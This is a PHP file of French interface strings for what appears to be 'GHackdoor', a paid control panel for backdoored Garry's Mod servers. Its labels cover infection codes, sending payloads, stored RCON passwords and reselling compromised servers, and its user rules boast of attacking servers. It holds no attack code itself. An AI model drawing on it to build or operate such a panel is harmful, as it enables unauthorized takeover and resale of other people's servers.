<?php

$lang = [
    "servers" => "Serveurs",
    "players" => "Joueurs",
    "nb_player_off" => "Joueurs enregistrés",
    "requests" => "Nombres  de requétes",
    "buy" => "Acheter",
    "user" => "Utilisateur",
    "settings" => "Paramétre",
    "extra" => "Extras",
    "dashboard" => "Dashboard",
    "rules" => "Régles",
    "rules1" => "Régles 1 - N'envoyer pas le lien de login, backdoor, AUCUN lien du panel ( Votre compte sera supprimer )",
    "rules2" => "Régles 2 - Ne partager pas votre ID et MDP a une personne sans autorisation du fondateur",
    "rules3" => "Régles 3 - Ne pas montrer des images/vidéos du panel, les admins s'occupe de sa pour les démonstration !",
    "rules4" => "Régles 4 - Ne pas mettre notre backdoor sur le workshop, ici on est la pour niquer des serveurs illégal et non des serveurs qui ont rien fait !",
    "project" => "Projets",
    "download" => "Télécharger",
    "infectioncode" => "Code d'infection",
    "users" => "Utilisateurs",
    "offlineservers" => "Serveurs Hors-Ligne",
    "sellservers" => "Serveurs a vendre",
    "playerslist" => "Liste des joueurs",
    "players" => "Joueurs",
    "adminisistration" => "adminisistration",
    "sendpayload" => "Envoyer un payload",
    "giveservers" => "Give Servers",
    "ipaddress" => "Addresse IP",
    "serverpassword" => "Mot de passe du serveur",
    "rconpassword" => "Remote Console (RCON) du serveur",
    "gamemode" => "Gamemode",
    "map" => "Map du serveur",
    "cac" => "Cake Anti-Cheat (CAC) ?",
    "snte" => "Say no to exploits (SNTE) ?",
    "lougout" => "Déconnecter",
    "loadpayload" => "Charger un payload",
    "arguments" => "Mode d'arguments",
    "argumentstext" => "Argument texte",
    "argumenttofpayload" => "Argument du payload",
    "cancel" => "Annulé",
    "reconnectwithrcon" => "Reconnecter par RCON",
    "servername" => "Nom du serveur",
    "lastpingdate" => "Dernier ping enregistrés",
    "warningofflineservermsg" => "⚠️ ATTENTIONS ! ⚠️ Un spam de Reconnection RCON fera laguer le site ! Si on vous reprends a plusieurs reprises spam, votre compte sera supprimer/banni temporairement ou permanent sans un moyen de remboursement ! ⚠️",
    "colorchange" => "Changer la couleur du panel",
    "profilelogo" => "Changer votre pdp",
    "urlimage" => "URL de l'image",
    "changepassword" => "Changer votre MDP",
    "oldpassword" => "Ancien MDP",
    "newpassword" => "Nouveau MDP",
    "confirmpassword" => "Confirmer le nouveau MDP",
    "changepassword" => "Changer le MDP",
    "waitserver" => "En attente de la réponsse du serveurs...",
    "setcode" => "Appliquer le code",
    "vip1" => "Accés fonctionnalité BÊTA",
    "vip2" => "Réduction 15 CC sur les serveurs que vous acheter",
    "vip3" => "Grade spécial sur le discord",
    "vip4" => "Couleur special sur votre profil",
    "vip5" => "Une réduction de 2€ a offrir a un ami pour l'achat d'un compte GHackdoor, ou a garder pour vous pour upgrade a vendeur !",
    "net" => "Vous n'avez pas assez de token !",
    "alreadyvip" => "Vous étes déja VIP !",
    "buysuccess" => "Achat réussie  ! Vous étes désromais VIP !",
    "unablebuy" => "Vous posséder déja sa"


];

?>